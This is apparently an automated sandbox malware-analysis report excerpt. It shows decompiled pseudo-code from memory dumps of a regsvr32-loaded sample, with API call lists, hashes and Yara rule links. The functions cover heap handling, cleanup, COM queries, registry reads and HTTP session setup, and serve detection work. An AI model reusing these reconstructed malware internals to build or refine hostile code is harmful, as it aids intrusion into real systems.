                • Instruction Fuzzy Hash: 24F03676100208BFEB11AF91DCC5F9B7B7CEB85764F10805AFD459A140E6B4BA90C771
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BCE024 Relevance: 4.5, APIs: 3, Instructions: 18memoryCOMMON
                Download Yara Rule
                APIs
                • SetEvent.KERNEL32(0000053C,04BE3A8C), ref: 04BCE02E
                  • Part of subcall function 04BC609C: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BCE039), ref: 04BC60C5
                  • Part of subcall function 04BC609C: RtlDeleteCriticalSection.NTDLL(04BEE460), ref: 04BC60F8
                  • Part of subcall function 04BC609C: RtlDeleteCriticalSection.NTDLL(04BEE480), ref: 04BC60FF
                  • Part of subcall function 04BC609C: ReleaseMutex.KERNEL32(000002B4,00000000,?,?,?,04BCE039), ref: 04BC6128
                  • Part of subcall function 04BC609C: CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC6134
                  • Part of subcall function 04BC609C: ResetEvent.KERNEL32(00000000,00000000,?,?,?,04BCE039), ref: 04BC6140
                  • Part of subcall function 04BC609C: CloseHandle.KERNEL32(?,?,04BCE039), ref: 04BC614C
                  • Part of subcall function 04BC609C: SleepEx.KERNEL32(00000064,00000001,00000000,?,?,?,04BCE039), ref: 04BC6152
                  • Part of subcall function 04BC609C: SleepEx.KERNEL32(00000064,00000001,?,?,04BCE039), ref: 04BC6166
                  • Part of subcall function 04BC609C: HeapFree.KERNEL32(00000000,00000000,?,?,04BCE039), ref: 04BC618A
                  • Part of subcall function 04BC609C: RtlRemoveVectoredExceptionHandler.NTDLL(04C005B8), ref: 04BC61C0
                  • Part of subcall function 04BC609C: SleepEx.KERNEL32(00000064,00000001,?,?,04BCE039), ref: 04BC61DC
                • CloseHandle.KERNEL32(0000053C), ref: 04BCE043
                • HeapDestroy.KERNELBASE(05E50000), ref: 04BCE053
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Sleep$CloseHandle$CriticalDeleteEventHeapSection$DestroyExceptionFreeHandlerMutexReleaseRemoveResetVectored
                • String ID:
                • API String ID: 2773679374-0
                • Opcode ID: 9b372ee26e4f71d73d639a624dfcd6f5d4915735aa81c858f8f71c36da089139
                • Instruction ID: 869fe3a44686bd5a7d596a1ed784f0c559df1b7fbf1fafb137204bb9a0ecb4aa
                • Opcode Fuzzy Hash: 9b372ee26e4f71d73d639a624dfcd6f5d4915735aa81c858f8f71c36da089139
                • Instruction Fuzzy Hash: 2CE01774700A01CBEB20AF32E8CDF0633A8EBC0201748086AB611DB482DB2CFC009AB4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F1A55 Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F1A55(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				void* _t35;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E031F2114(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0x31fa330, 0x110);
					_t27 =  *0x31fa334; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E031F4B70(0x110, _a4, _t27, 0);
					}
					if(E031F6D8B( &_v36) != 0) {
						_t35 = E031F78F2(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
						if(_t35 == 0) {
							_t55 = _v20;
							_v36 =  *_t46;
							_t38 = E031F24F7(_t55, _a8, _t51, _t46, _a12); // executed
							_v16 = _t38;
							 *(_t55 + 4) = _v36;
							_t20 =  &(_t46[4]); // 0xbf0845c7
							memset(_t55, 0, _v12 - ( *_t20 & 0xf));
							_t57 = _t57 + 0xc;
							E031F2C11(_t55);
						}
					}
					memset(_a4, 0, _t53);
					E031F2C11(_a4);
				}
				return _v16;
			}
















                0x031f1a5b
                0x031f1a60
                0x031f1a6d
                0x031f1a70
                0x031f1a73
                0x031f1a7a
                0x031f1a7d
                0x031f1a8b
                0x031f1a90
                0x031f1a95
                0x031f1a9a
                0x031f1a9c
                0x031f1aa4
                0x031f1aa4
                0x031f1ab3
                0x031f1ac8
                0x031f1acf
                0x031f1ad6
                0x031f1adc
                0x031f1ae2
                0x031f1aea
                0x031f1af0
                0x031f1af3
                0x031f1b00
                0x031f1b05
                0x031f1b09
                0x031f1b09
                0x031f1acf
                0x031f1b14
                0x031f1b1f
                0x031f1b1f
                0x031f1b2b

                APIs
                  • Part of subcall function 031F2114: RtlAllocateHeap.NTDLL(00000000,00000000,031F6F72), ref: 031F2120
                • memcpy.NTDLL(00000000,00000110,?,?,?,?,031F4F92,?,031F7307,031F7307,?), ref: 031F1A8B
                • memset.NTDLL ref: 031F1B00
                • memset.NTDLL ref: 031F1B14
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: memset$AllocateHeapmemcpy
                • String ID:
                • API String ID: 1529149438-0
                • Opcode ID: 26a6a9044868d8bc47b33cdd67d37da5cadacdf75f12f7b793385fadab28694a
                • Instruction ID: a618b25e185469cd2d62776cdaca7b55c41326e404959bff3343246e831830d8
                • Opcode Fuzzy Hash: 26a6a9044868d8bc47b33cdd67d37da5cadacdf75f12f7b793385fadab28694a
                • Instruction Fuzzy Hash: 98210A79A00218BFDB11EBA5CC41FEEBBB8AF4C640F044065FA08EA241E734D645CBA5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F3035 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 89%
                			E031F3035(void* __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E031F134A(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x31fa2d8; // 0x240d5a8
						_t9 = _t17 + 0x31fba3c; // 0x444f4340
						_t20 = E031F2638( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x31fa290, 0, _a4); // executed
					}
				}
				return _t26;
			}








                0x031f3038
                0x031f303e
                0x031f3095
                0x031f3044
                0x031f304f
                0x031f3054
                0x031f3058
                0x031f3065
                0x031f306d
                0x031f3079
                0x031f3081
                0x031f308b
                0x031f308b
                0x031f3058
                0x031f309a

                APIs
                  • Part of subcall function 031F134A: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 031F1362
                  • Part of subcall function 031F2638: lstrlen.KERNEL32(74E5F710,?,00000000,?,74E5F710), ref: 031F266C
                  • Part of subcall function 031F2638: StrStrA.SHLWAPI(00000000,?), ref: 031F2679
                  • Part of subcall function 031F2638: RtlAllocateHeap.NTDLL(00000000,?), ref: 031F2698
                • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,031F20B3), ref: 031F308B
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$Allocate$Freelstrlen
                • String ID: Ut
                • API String ID: 2220322926-8415677
                • Opcode ID: c5fcef357b040dc78361277312b8ca784f3b2c7ad96aff160db37a8c5a2cc7da
                • Instruction ID: c761c2ea6d7b077e6a38dbff9cae8fbca58b898c9a8bfbfa3946ace5ae251c26
                • Opcode Fuzzy Hash: c5fcef357b040dc78361277312b8ca784f3b2c7ad96aff160db37a8c5a2cc7da
                • Instruction Fuzzy Hash: 4C01813A100608FFDB15DF54CC04E9A7BA9EF4C350F148525FA5A86660E732EA95DF60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F2C11 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 5memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E031F2C11(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x31fa290, 0, _a4); // executed
				return _t2;
			}




                0x031f2c1d
                0x031f2c23

                APIs
                • RtlFreeHeap.NTDLL(00000000,00000000,031F7013,00000000,?,?,00000000), ref: 031F2C1D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID: Ut
                • API String ID: 3298025750-8415677
                • Opcode ID: fd699bdc60b095284c569a5ecda977582e4688aded8d8505f1225598d0677055
                • Instruction ID: d383bb6974a02bdcd94ba0b4b054b036d13b5f4c5e948f26c581a4ad12549709
                • Opcode Fuzzy Hash: fd699bdc60b095284c569a5ecda977582e4688aded8d8505f1225598d0677055
                • Instruction Fuzzy Hash: D2B01231104100AFCB0A7B00DD08F057B22FB5CB00F004010B20D80078C33384B0FF24
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F63FF Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                Download Yara Rule
                C-Code - Quality: 38%
                			E031F63FF(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0x31fa2d8; // 0x240d5a8
				_t4 = _t49 + 0x31fb44c; // 0x56089f4
				_t5 = _t49 + 0x31fb43c; // 0x9ba05972
				_t51 =  *0x31fa140(_t5, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0x31fa2d8; // 0x240d5a8
						_t30 = _t56 + 0x31fb42c; // 0x56089d4
						_t31 = _t56 + 0x31fb45c; // 0x4c96be40
						_t58 =  *0x31fa114(_v12, _t31, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0x31fa2d8; // 0x240d5a8
											_t23 = _t76 + 0x31fb42c; // 0x56089d4
											_t24 = _t76 + 0x31fb45c; // 0x4c96be40
											_t105 =  *0x31fa114(_v12, _t24, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0x31fa2d8; // 0x240d5a8
													_t67 = _v28;
													_t40 = _t99 + 0x31fb41c; // 0x214e3
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t40, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                0x031f640a
                0x031f640c
                0x031f6413
                0x031f6414
                0x031f6415
                0x031f6416
                0x031f641c
                0x031f6421
                0x031f642b
                0x031f6432
                0x031f6438
                0x031f643c
                0x031f6442
                0x031f644a
                0x031f644b
                0x031f6450
                0x031f6451
                0x031f6453
                0x031f6456
                0x031f6457
                0x031f6458
                0x031f645e
                0x031f64f3
                0x031f64f8
                0x031f64ff
                0x031f6509
                0x031f650f
                0x031f6511
                0x031f6517
                0x00000000
                0x031f6464
                0x031f6464
                0x031f646b
                0x031f6474
                0x031f6478
                0x031f647e
                0x031f6481
                0x031f64e8
                0x00000000
                0x031f6483
                0x031f6483
                0x031f651a
                0x031f651c
                0x00000000
                0x00000000
                0x031f6489
                0x031f6489
                0x031f6489
                0x031f6490
                0x031f6496
                0x031f649b
                0x031f64a3
                0x031f64a4
                0x031f64a5
                0x031f64a7
                0x031f64ab
                0x031f64af
                0x00000000
                0x031f64b1
                0x031f64b5
                0x031f64ba
                0x031f64c1
                0x031f64d1
                0x031f64d3
                0x031f64d9
                0x031f64de
                0x031f651e
                0x031f651e
                0x031f652b
                0x031f652f
                0x031f6534
                0x031f653a
                0x031f653f
                0x031f6549
                0x031f654b
                0x031f6551
                0x031f6551
                0x031f6554
                0x031f655a
                0x00000000
                0x00000000
                0x00000000
                0x031f64de
                0x00000000
                0x031f64e0
                0x031f64e0
                0x031f64e1
                0x00000000
                0x031f64e6
                0x031f6483
                0x031f6481
                0x031f6478
                0x031f655d
                0x031f655d
                0x031f6563
                0x031f6563
                0x031f656c

                APIs
                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,056089D4,031F2D5F,?,?,?,?,?,?,?,?,?,?,?,031F2D5F), ref: 031F64CB
                • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,056089D4,031F2D5F,?,?,?,?,?,?,?,031F2D5F,00000000,00000000,00000000,006D0063), ref: 031F6509
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: QueryServiceUnknown_
                • String ID:
                • API String ID: 2042360610-0
                • Opcode ID: f80b06c47aa49f9d764c011c205554df3f4543c6f4354e0be0209256cf792a59
                • Instruction ID: ea86aa52867e3928e15d1133ffa7e58b22875102b8d17126d1dac3a328d6af02
                • Opcode Fuzzy Hash: f80b06c47aa49f9d764c011c205554df3f4543c6f4354e0be0209256cf792a59
                • Instruction Fuzzy Hash: 04514076900519AFCB00DFE8C888DAEB7B8FF8C714B158559EA05EB225D731AD45CFA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F3807 Relevance: 3.1, APIs: 2, Instructions: 122COMMON
                Download Yara Rule
                C-Code - Quality: 21%
                			E031F3807(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				void* _v8;
				char _v12;
				signed int _t37;
				long _t39;
				long _t40;
				signed int _t41;
				void* _t42;
				signed int _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t46;
				intOrPtr _t48;
				void* _t65;
				intOrPtr* _t67;
				intOrPtr* _t68;
				void* _t71;

				_t68 = __esi;
				_t65 = E031F23CC(_t37, _a4);
				if(_t65 == 0) {
					L18:
					_t39 = GetLastError();
				} else {
					_t40 = GetVersion();
					_t71 = _t40 - 6;
					if(_t71 > 0 || _t71 == 0 && _t40 > 2) {
						_a4 = 4;
					} else {
						_a4 = 0;
					}
					__imp__(_t65, _a4, 0, 0, 0); // executed
					 *(_t68 + 0x10) = _t40;
					_t41 = E031F2C11(_t65);
					if( *(_t68 + 0x10) == 0) {
						goto L18;
					} else {
						_t42 = E031F23CC(_t41,  *_t68);
						_v8 = _t42;
						if(_t42 == 0) {
							goto L18;
						} else {
							_t67 = __imp__; // 0x6f99f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t68 + 0x10), _v8, 0x50, 0);
								 *((intOrPtr*)(_t68 + 0x14)) = _t42;
								_t43 = E031F2C11(_v8);
								if( *((intOrPtr*)(_t68 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x100;
									_t44 = E031F23CC(_t43,  *((intOrPtr*)(_t68 + 4)));
									_v8 = _t44;
									if(_t44 == 0) {
										goto L18;
									} else {
										_t45 =  *0x31fa2d8; // 0x240d5a8
										_t21 = _t45 + 0x31fb758; // 0x450047
										_t46 = _t21;
										__imp__( *((intOrPtr*)(_t68 + 0x14)), _t46, _v8, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t68 + 0x18)) = _t46;
										E031F2C11(_v8);
										_t48 =  *((intOrPtr*)(_t68 + 0x18));
										if(_t48 == 0) {
											goto L18;
										} else {
											_v12 = 4;
											__imp__(_t48, 0x1f,  &_a4,  &_v12);
											if(_t48 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t67( *((intOrPtr*)(_t68 + 0x18)), 0x1f,  &_a4, 4);
											}
											_push(4);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t68 + 0x18)));
											if( *_t67() == 0) {
												goto L18;
											} else {
												_push(4);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t68 + 0x18)));
												if( *_t67() == 0) {
													goto L18;
												} else {
													_t39 = 0;
												}
											}
										}
									}
								}
							} else {
								_t42 =  *_t67( *(_t68 + 0x10), 3,  &_a8, 4);
								if(_t42 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t39;
			}



















                0x031f3807
                0x031f3816
                0x031f381c
                0x031f3952
                0x031f3952
                0x031f3822
                0x031f3822
                0x031f3828
                0x031f382a
                0x031f3838
                0x031f3833
                0x031f3833
                0x031f3833
                0x031f3846
                0x031f384d
                0x031f3850
                0x031f3858
                0x00000000
                0x031f385e
                0x031f3860
                0x031f3867
                0x031f386a
                0x00000000
                0x031f3870
                0x031f3873
                0x031f3879
                0x031f3890
                0x031f3899
                0x031f38a2
                0x031f38a5
                0x031f38ad
                0x00000000
                0x031f38b3
                0x031f38bb
                0x031f38be
                0x031f38c7
                0x031f38ca
                0x00000000
                0x031f38d0
                0x031f38d3
                0x031f38de
                0x031f38de
                0x031f38e8
                0x031f38f1
                0x031f38f4
                0x031f38f9
                0x031f38fe
                0x00000000
                0x031f3900
                0x031f390b
                0x031f3912
                0x031f391a
                0x031f391c
                0x031f392a
                0x031f392a
                0x031f392c
                0x031f3931
                0x031f3932
                0x031f3934
                0x031f393b
                0x00000000
                0x031f393d
                0x031f393d
                0x031f3942
                0x031f3943
                0x031f3945
                0x031f394c
                0x00000000
                0x031f394e
                0x031f394e
                0x031f394e
                0x031f394c
                0x031f393b
                0x031f38fe
                0x031f38ca
                0x031f387b
                0x031f3886
                0x031f388a
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x031f388a
                0x031f3879
                0x031f386a
                0x031f3858
                0x031f395b

                APIs
                  • Part of subcall function 031F23CC: lstrlen.KERNEL32(?,00000000,05609B30,00000000,031F3413,05609D0E,69B25F44,?,?,?,?,69B25F44,00000005,031FA010,4D283A53,?), ref: 031F23D3
                  • Part of subcall function 031F23CC: mbstowcs.NTDLL ref: 031F23FC
                  • Part of subcall function 031F23CC: memset.NTDLL ref: 031F240E
                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,031F1064,00000000,00000000,05609618,?,?,031F6C0C,?,05609618,0000EA60), ref: 031F3822
                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,031F1064,00000000,00000000,05609618,?,?,031F6C0C,?,05609618,0000EA60), ref: 031F3952
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                • String ID:
                • API String ID: 4097109750-0
                • Opcode ID: 1ca62e224f36cc1db56a3b221787b08e6a49c7e5c1dd8da8b3e4a6f9a0947fe0
                • Instruction ID: 78c8c185f1c79266ced551a9f5ba126094b7d51122b28c435073c3e3bb8ca14f
                • Opcode Fuzzy Hash: 1ca62e224f36cc1db56a3b221787b08e6a49c7e5c1dd8da8b3e4a6f9a0947fe0
                • Instruction Fuzzy Hash: 8F418EB9500309BFDB24EF60CC45EAABBF8FB4C740F044929BB55861A0D771DA85DB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 031F51C7 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                Download Yara Rule
                C-Code - Quality: 75%
                			E031F51C7(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E031F2C2D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x31fa2d8; // 0x240d5a8
						_t20 = _t68 + 0x31fb1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E031F6AEB(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                0x031f51cd
                0x031f51d0
                0x031f51e0
                0x031f51e9
                0x031f51ed
                0x031f52bb
                0x031f52c1
                0x031f52c1
                0x031f5207
                0x031f520c
                0x031f5210
                0x031f5216
                0x031f521b
                0x031f5222
                0x031f5231
                0x031f5231
                0x031f5235
                0x031f5237
                0x031f5243
                0x031f524e
                0x031f5259
                0x031f525d
                0x031f5267
                0x031f526b
                0x031f526d
                0x031f5272
                0x031f5279
                0x031f5289
                0x031f5289
                0x031f5272
                0x031f526b
                0x031f528b
                0x031f5290
                0x031f5295
                0x031f5295
                0x031f529b
                0x031f52a1
                0x031f52a6
                0x031f52a6
                0x031f52ab
                0x031f52b0
                0x031f52b0
                0x031f52ab
                0x031f5235
                0x031f52b2
                0x031f52b8
                0x00000000

                APIs
                  • Part of subcall function 031F2C2D: SysAllocString.OLEAUT32(80000002), ref: 031F2C84
                  • Part of subcall function 031F2C2D: SysFreeString.OLEAUT32(00000000), ref: 031F2CE9
                • SysFreeString.OLEAUT32(?), ref: 031F52A6
                • SysFreeString.OLEAUT32(031F1C26), ref: 031F52B0
                Memory Dump Source
                • Source File: 00000003.00000002.516097770.00000000031F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 031F0000, based on PE: true
                • Associated: 00000003.00000002.516050740.00000000031F0000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516231740.00000000031F9000.00000002.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516301623.00000000031FA000.00000004.10000000.00040000.00000000.sdmpDownload File
                • Associated: 00000003.00000002.516392711.00000000031FC000.00000002.10000000.00040000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_31f0000_regsvr32.jbxd
                Similarity
                • API ID: String$Free$Alloc
                • String ID:
                • API String ID: 986138563-0
                • Opcode ID: 3f5368e0c4b76e48ab3094b8586042adcfec34623c9474ccd8c59cc5fe6458d2
                • Instruction ID: 9e831aeb3e615e5b70095475572ef5e515e6635f938a8d4f9aa12e1f3558d644
                • Opcode Fuzzy Hash: 3f5368e0c4b76e48ab3094b8586042adcfec34623c9474ccd8c59cc5fe6458d2
                • Instruction Fuzzy Hash: 6E312676900118EFCB11DF94C888C9BBB7AFF8E6407188658F9069B210D731ED92CBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Function 04BC8FFC Relevance: 3.1, APIs: 2, Instructions: 80registryCOMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 04BCD0E6: RegCreateKeyA.ADVAPI32(80000001,0624B7F0,?), ref: 04BCD0FB
                  • Part of subcall function 04BCD0E6: lstrlen.KERNEL32(0624B7F0,00000000,00000000,04BED06E,?,?,?,04BC902F,00000001,?), ref: 04BCD124
                • RegQueryValueExA.KERNELBASE(?,?,00000000,?,04BED068,?,00000001,?,?,04BED06E,?,?,?,?), ref: 04BC9050
                • RegCloseKey.ADVAPI32(?,?,04BED06E,?,?,?,?), ref: 04BC9099
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseCreateQueryValuelstrlen
                • String ID:
                • API String ID: 971780412-0
